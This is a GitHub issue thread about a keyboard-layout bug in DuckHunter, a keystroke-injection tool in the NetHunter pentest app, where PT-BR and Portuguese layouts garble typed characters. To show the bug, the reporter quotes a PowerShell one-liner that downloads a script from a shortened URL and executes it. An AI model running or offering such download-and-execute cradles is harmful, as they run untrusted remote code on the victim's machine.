### ISSUE TITLE
DuckHunter Support: PT-BR Keyboards

### ISSUE THREAD

**Issue by GabrielTK** [offensive-security/nethunter-app#169]
Hey Guys,
I was testing DuckHunter when I noticed the following happens:
`iex (wget "http://bit.ly/dfdfdf").Content` is written as `iex (wget ^httpÇ;;bit.ly;dfdfdf^).Content` and, if I choose Portuguese in languages, `iex *wet @http>&&bit.ly&dfdfdf@(.Content`. The computer keyboard Layout is PT-BR (ABNT). 

Can someone implement PT-BR layout or explain how to do so, so I can do it and send a PR??
Thx :D

**Comment by jmingov** [comment]
Hi @GabrielTK,

The file you need to edit is in other repo, in the app repo.

https://github.com/offensive-security/nethunter-app/blob/master/assets/nh_files/modules/keyseed.py#L1306

We already have PT integrated, so it can be a wrong char mapping or just PT_BR is making use of a different key layout.

**Comment by guilherme-gmonteiro** [comment]
Hey, 

I Tested too and  keys 'g' and G dont work in pt-br or in pt language

can someone explain how to add?

**Comment by Re4son** [comment]
Should be fixed with v2019.2-rc2
Please reopen if you still experience issues.
